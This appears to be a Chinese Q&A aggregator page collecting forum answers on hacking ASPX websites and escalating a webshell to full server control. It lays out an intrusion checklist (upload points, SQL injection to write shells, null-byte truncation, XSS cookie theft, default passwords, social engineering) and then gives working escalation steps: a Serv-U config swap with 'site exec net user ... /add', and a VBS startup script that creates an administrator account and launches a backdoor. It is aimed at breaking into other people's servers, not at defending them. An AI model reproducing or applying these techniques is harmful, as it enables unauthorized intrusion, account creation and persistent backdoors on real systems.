入侵aspx站要用什么方法呢

入侵aspx站要用什么方法呢,第1张

1无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!

2asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;

3asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;

4php+MYSQL一般是注入进后台上传,偶尔运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传文件或者写到log里;然后php程序某某未公开的漏洞,运气好可以直接写shell。

5jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的。

6无论什么大站,主站一般都很安全(不然早被人玩了),于是一般从二级域名下手,猜出主站的某些用户名与密码或者搞到主站的源代码,或者旁注得到同网段服务器后cain或arp。

7一般的大站很少有用现成的CMS的,于是如果你有幸找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都掌握在你手里。多看看那些大站新出来的测试分站点,那些站还在测试中,可以很轻松拿下。

8上传有个文件名截断,这包括2个方面,一是00截断,二是长文件名截断(曾经利用这个搞下hw);然后很多写文件的地方,都可以00,屡试不爽。上传别忘了asp(当然asa,cer,cdx都可以啦)目录的妙用。

9php站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在server变量注入的时候还是可以select into outfile,今年我搞过某未开源cms就是这个情况,一般情况下为on就别考虑写文件了,不过有这个权限别忘了读文件源码,因为load_file的参数是可以编码的。

10猜路径或者文件在入侵中非常必要,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可以考虑看站点下的robottxt或者robotstxt,会有惊喜。

11工具的使用很重要,入侵之前用WVS扫扫会有助入侵;注入工具虽然很多,但不见得都好使,现在的软硬防火墙、防注入越来越厉害,那时候你就别偷懒,多手工有助你成长。

12遇到过一流监控么,遇到其他防post的防火墙么,有时候一句话进去了都无法传大马,那时候,你先学学编码,学学变换绕过。

13想搞一般的小站,记得查看这个小站的版权,找做这个站的公司,然后从这个公司做的其他站下手,得到源码再回头搞,我曾经通过这个方法拿下某知名制药的公司站。

14旁注的思路永远不过时,遇到dbowner的注入,可以很舒服写shell到你需要的站,省得麻烦的提权了;运气不好,按部就班拿shell提权得到你所需。

15永远别忘记社会工程学,利用社工把自己当成一个什么也不会的人,从某某站长的qq,身份z,邮箱等等下手,也许有时可能会有意外;另外别忘记admin,admin;test,test;123456,123456这种简单的尝试,当然,你也可以暴力破解。

16别忽视XSS,别忽视cookie,XSS可以偷cookie,更有若干妙用,自己学会领悟;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙。

17平时搞站多多搜集路径啊,源码啊,工具啊,充实自己的“武器”库;最好把自己的入侵步骤记录下来,或者事后反思下,我一般都是记在txt里,另外要做到举一反三。

18多学习,多看源码,多看公布出来的0day,脚本是入侵的前提,而不是工具,会用工具会装B你还没入门。

最后奉劝诸位有事没事改人家首页的装B者,出来混,迟早是要还的,别等进了局子再后悔。还有一点,就是我搞N多站,没挂过一个马,至于很多挂马的人,我不知道该说什么,因为大家都喜欢钱,但是还是少为之吧。

这服务器安全不错(可能是一个空间就没办法了)不是空间的话,能利用的只有ftp,如果ftp有漏洞的话,,,,

如果c盘的,,,启动文件夹有写权限的话加个建开3389和建用户的批处理

方法很多,自己动脑筋,shell又不在我手上

小菜使用工具,高手手动判断。啊D,明小儿啊。。。各种提交工具,工具很多的,建表的目的,像你说的那样可能是提权,也可能是挂马,先写数据,利用数据厍备份和还原来生成马,拿SHELL,网站不过滤或过滤不严格,拿shell就和切菜一样。。。

说到花了九牛二虎的力气获得了一个webshell,

当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~

嘻嘻~~好跟我来,看看有什么可以利用的来提升权限

第一

如果服务器上有装了pcanywhere服务端,管理员为了管理方便

也给了我们方便,到系统盘的Documents and Settings/All Us

ers/Application Data/Symantec/pcAnywhere/中下载cif本地

破解就使用pcanywhere连接就ok了

第二

有很多小黑问我这么把webshell的iis user权限提升

一般服务器的管理都是本机设计完毕然后上传到空间里,

那么就会用到ftp,服务器使用最多的就是servu

那么我们就利用servu来提升权限

通过servu提升权限需要servu安装目录可写~

好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemonini把他下载

下来,然后在本机上安装一个servu把ServUDaemonini放到本地安装文件夹下覆盖,

启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限

然后去servu安装目录里把ServUDaemonini更换服务器上的。

用我新建的用户和密码连接~

好的,还是连上了

ftp

ftp>open ip

Connected to ip

220 Serv-U FTP Server v5004 for WinSock ready

User (ip:(none)): id //刚才添加的用户

331 User name okay, please send complete E-mail address as password

Password:password //密码

230 User logged in, proceed

ftp> cd winnt //进入win2k的winnt目录

250 Directory changed to /WINNT

ftp>cd system32 //进入system32目录

250 Directory changed to /WINNT/system32

ftp>quote site exec netexe user rover rover1234 /add //利用系统的netexe

文件加用户。

如果提示没有权限,那我们就

把后门(serverexe) 传他system32目录

然后写一个VBs教本

set wshshell=createobject ("wscriptshell")

a=wshshellrun ("cmdexe /c net user user pass /add",0)

b=wshshellrun ("cmdexe /c net localgroup Administrators user /add",0)

b=wshshellrun ("cmdexe /c serverexe",0)

存为xxvbe

这个教本的作用是建立user用户密码为pass

并且提升为管理员

然后执行system32目录下的serverexe

把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动

目录

这样管理员只要一登陆就会执行那个教本

接下来就是等了等他登陆

第三

就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。

第四

查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所

收获等等。

第五

使用Flashfxp也能提升权限,但是成功率就看你自己的运气了

首先找到FlashFXP文件夹,打开(编辑)Sites dat,这个文件这是什么东西密码和用户名,

而且密码是

以上就是关于入侵aspx站要用什么方法呢全部的内容,包括:入侵aspx站要用什么方法呢、拿到一个webshell,该如何提权呢。、MSsql2000 网站 数据库被黑客新建了几个表,表里面没有数据!等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/sjk/10182761.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-06
下一篇 2023-05-06

发表评论

登录后才能评论

评论列表(0条)

保存